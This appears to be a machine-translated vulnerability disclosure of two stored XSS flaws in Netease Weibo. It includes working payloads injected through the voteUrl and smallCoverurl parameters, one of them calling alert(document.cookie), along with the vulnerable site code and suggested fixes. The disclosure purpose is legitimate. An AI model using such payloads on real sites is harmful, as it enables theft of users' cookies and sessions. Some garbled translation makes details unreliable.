Netease Weibo two storage-type XSS

First:
1. Send a microblog on the homepage, capture the package, and modify it. Content = test & isRetweet = 0 & replyOriginal = 0 & replyIt = 0 & flag = 0 & imageUrl = & voteUrl = bbb "> <> modified the voteUrl parameter to bbb"> <>, then submit. 2. Return to the home page and publish a microblog. However, there is a request like this in Burp: http://163.fm /GetOriginal? Callback = expires & q = T7n6r0L & _ = 1348642200976 (this address was captured later, but the problem can be explained.) The content is jQuery16109319937340915203_1348642196756 ("bbb"> <> "); this is a jsonp request, but the problem arises. This data is not processed. In addition, this code must be loaded to the homepage for js Code Execution. we construct the code for closing callback, and insert our own js Code later on the homepage for execution. 3. After sending a microblog, change the voteUrl parameter to "); alert (document. cookie); //, visit the home page again and find that there is no pop-up box, and there is no similar request as before. However, we ignored the problem that the content parameter is Weibo content, but our Weibo posts contain a short link address of Netease Weibo. http://163.fm /T7n6r0L, move the mouse over it, and the miracle appears. The js Code we inserted is displayed. 4. The voteUrl parameter is literally a voting address. In the initial analysis, Netease Weibo directly converts the parameter to a short link address without verifying it. Slave http://163.fm /GetOriginal? Callback = jQuery16109319937340915203_1348642196756 & q = T7n6r0L & _ = 1348642200976 the content returned by this address can also be determined. The parameter passed into callback is the value of voteUrl. 5. I executed the js code, but I don't know why? First, find getOriginal in firebug http://img2.cache.netease.com/t/cssjs/439756/script/page/home.js Found in: define ("utils/DataSource", function (a, B, c) {var d = a ("external/jquery "), e = a ("model/UserData"), f = a ("utils/log/Logger"), g = {keyFrom: null, requestMap: {longUrl: {url :" http://163.fm /GetOriginal ", login :! 1}, this is just the definition, in the home. search for longUrl in js and run the following code: define ("task/queue URL", function (a, B, c) {var d = a ("task/TaskManager "), e = a ("task/Task"); d. add (new e ("signed URL", function () {var B = a ("external/jquery"), c = a ("utils/DataSource"); B (document. body ). delegate (". short-url: not (. processed) "," mouseenter ", function (a) {var d = B (a.tar get), e = d. addClass ("processed "). text (); if (e. indexOf (" http://163.fm ") = 0) {var f = e. substr (14); c. get ("longUrl", {q: f}, function (a) {d. attr ("title", a)}, "jsonp")}); in the above code, we can roughly find out the cause of the problem:) modify the parameter voteUrl to publish Weibo B) voteUrl is converted into a short link address, and the corresponding long link address is the value of voteUrl c) Weibo contains this short link address, when you move the mouse to the short link address, the mouseenter event will be triggered. d. After responding to the mouseenter event, the system takes the seven characters after the short link and uses these seven characters as the value of the q Parameter, then go http://163.fm /GetOriginal requests resources. Execute our js Code in this step. E) Finally, place the real long link address corresponding to the short link to the title attribute of tag a on Weibo. Solution: 1. Determine the voteUrl parameter. 2. Perform js escape on the value of voteUrl when calling jsonp.


Although the previous vulnerability was sent to Weibo, it still requires a small interaction to trigger the vulnerability (but most people will have this interaction ). In this Netease Weibo vulnerability, xss vulnerabilities are triggered when you see Weibo. 1. First, the vulnerability occurs in the voting place. 2. images can be uploaded at the place where voting is created. xss is easy to appear. Let's upload an image, at the same time, add other items for voting and cut off the request when submitting the ticket, the following data will be sent to the server: title = % E9 % 92% 93% E9 % B1 % BC % E5 % B2 % 9B & description = & option % 5B % 5D = % E4 % B8 % AD % E5 % 9B % BD % E7 % 9A % 84 & option % 5B % 5D = % E4 % B8 % AD % E5 % 9B % BD % E7 % 9A % 84 & voteType = 1 & endTime = & coverurl = http % 3A % 2F % 2F126. fm % 2F2bqmHT & smallCoverurl = http % 3A % 2F % 2Ftimge4.126.net % 2 Fimage % 3Fw % 3D322% 26 h % 3D115% 26url % 3 Dhttp % 253A % 252F % 252F126. fm % 252F2bqmHT % 26gif % 3D 1% 26 quality % 3D85 in the actual test, I added a character similar to "> <bbb> after each parameter, created a vote, published a microblog, and visited the microblog just published, then, search for characters like <bbb> in the source code. Unfortunately, the img Tag appears after the img tag. Because it is accessed on the homepage, it is generally determined that the smallCoverurl parameter is not properly filtered. 4. Create a new vote and submit it as follows: title = % E9 % 92% 93% E9 % B1 % BC % E5 % B2 % 9B & description = & option % 5B % 5D = % E4 % B8 % AD % E5 % 9B % BD % E7 % 9A % 84 & option % 5B % 5D = % E4 % B8 % AD % E5 % 9B % BD % E7 % 9A % 84 & voteType = 1 & endTime = & coverurl = http % 3A % 2F % 2F126. fm % 2F2bqmHT & smallCoverurl = http % 3A % 2F % 2Ftimge4.126.net % 2 Fimage % 3Fw % 3D322% 26 h % 3D115% 26url % 3 Dhttp % 253A % 252F % 252F126. fm % 252F2bqmHT % 26gif % 3D1% 26 quality % 3D85 "onload = alert (1) a =" 5. Visit the newly published Weibo and run our alert (1) smoothly ).: Or access: http://t.163.com/0086269676 Solution: 1. encode the coverurl and smallCoverurl parameters. Although I have not tested the coverurl parameter, I think it should also have a problem.